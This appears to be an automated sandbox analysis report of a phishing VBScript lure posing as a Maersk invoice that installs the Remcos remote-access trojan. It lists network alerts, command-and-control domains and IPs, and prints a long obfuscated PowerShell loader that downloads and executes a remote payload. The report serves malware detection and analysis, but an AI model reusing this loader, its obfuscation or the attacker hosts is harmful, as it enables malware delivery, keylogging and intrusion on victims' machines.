Source: Traffic	Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.4:49740 -> 206.123.148.198:3980
Source: Traffic	Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.4:49742 -> 206.123.148.198:3980

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: janbours92harbu02.duckdns.org

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 206.123.148.198 ports 3980,3981,0,3,8,9

Uses dynamic DNS services

Source: unknown	DNS query: name: janbours92harbu03.duckdns.org
Source: unknown	DNS query: name: janbours92harbu02.duckdns.org

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49740 -> 206.123.148.198:3980

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 103.195.237.43 103.195.237.43

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: M247GB M247GB

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /Outgassed.emz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: contemega.com.doConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /QJqDH201.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.195.237.43Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43
Source: unknown	TCP traffic detected without corresponding DNS query: 103.195.237.43

Source: global traffic	HTTP traffic detected: GET /Outgassed.emz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: contemega.com.doConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /QJqDH201.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.195.237.43Cache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: contemega.com.do
Source: global traffic	DNS traffic detected: DNS query: janbours92harbu02.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: janbours92harbu03.duckdns.org

Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.1
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.19
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.2
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.23
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.4
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2961771384.0000000005F99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/
Source: wab.exe, 0000000A.00000002.2961771384.0000000005F99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/;
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/O
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Ou
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Out
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outg
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outga
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outgas
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outgass
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outgasse
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outgassed
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outgassed.
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outgassed.e
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outgassed.em
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2299590839.0000000004787000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outgassed.emz
Source: powershell.exe, 00000001.00000002.2386862644.00000170242A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2386862644.0000017022C25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/Outgassed.emzX
Source: wab.exe, 0000000A.00000002.2974055601.0000000021870000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/QJqDH201.bin
Source: wab.exe, 0000000A.00000002.2974055601.0000000021870000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/QJqDH201.binEyessVescontemega.com.do/QJqDH201.bin
Source: wab.exe, 0000000A.00000002.2961771384.0000000005F38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/QJqDH201.binTq
Source: wab.exe, 0000000A.00000002.2961771384.0000000005F38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://103.195.237.43/QJqDH201.binV
Source: powershell.exe, 00000001.00000002.2386862644.00000170247CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://contemega.com.do
Source: wscript.exe, 00000000.00000003.1656474620.000001816A47F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1681014882.000001816851B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679774985.000001816850E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1680311691.000001816851B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1657183676.000001816A480000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1656928856.000001816A47F000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1680127852.0000018168534000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679774985.000001816850E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1681044219.0000018168535000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabP=
Source: wscript.exe, 00000000.00000002.1681014882.000001816851B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1679774985.000001816850E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1680311691.000001816851B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDu
Source: wscript.exe, 00000000.00000003.1657121988.0000018168591000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1657029537.0000018168569000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?67126171c7
Source: powershell.exe, 00000001.00000002.2481281446.0000017032A72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2301952677.000000000569A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.2299590839.0000000004787000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2386862644.0000017022A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2299590839.0000000004631000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2299590839.0000000004787000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.2386862644.0000017022A01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.2299590839.0000000004631000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.2386862644.00000170247CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.P
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.c
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.co
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.d
Source: powershell.exe, 00000001.00000002.2386862644.00000170242A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2386862644.0000017022C25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/O
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Ou
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Out
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Outg
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Outga
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Outgas
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Outgass
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Outgasse
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Outgassed
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Outgassed.
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Outgassed.e
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Outgassed.em
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2299590839.0000000004787000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Outgassed.emz
Source: powershell.exe, 00000004.00000002.2301952677.000000000569A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2301952677.000000000569A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2301952677.000000000569A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.2299590839.0000000004787000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2386862644.0000017023C5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.2481281446.0000017032A72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2301952677.000000000569A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443

Source: unknown

HTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.4:49731 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe

Jump to behavior

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: Process Memory Space: wab.exe PID: 6444, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_6540.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4412, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6540, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Potential malicious VBS script found (suspicious strings)

Source:

Initial file: Call Monaxial.ShellExecute("P" & Piskefldens, Guidernes96, "", "", Preconsultor187)

Sample has a suspicious name (potential lure to open the executable)

Source: Maersk_BL_Invoice_Packinglist.vbs

Static file information: Suspicious name

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 4117
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 4117
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 4117	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 4117	Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,			Jump to behavior

Contains functionality to call native functions

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 10_2_05445C17 Sleep,NtProtectVirtualMemory,

10_2_05445C17

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B88C2B2	1_2_00007FFD9B88C2B2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B88B506	1_2_00007FFD9B88B506
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0454F1F0	4_2_0454F1F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0454FAC0	4_2_0454FAC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0454EEA8	4_2_0454EEA8

Java / VBScript file with very long strings (likely obfuscated code)

Source: Maersk_BL_Invoice_Packinglist.vbs

Initial sample: Strings found which are bigger than 50

Uses reg.exe to modify the Windows registry

Source: C:\Windows\SysWOW64\cmd.exe

Yara signature match

Source: amsi32_6540.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4412, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6540, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

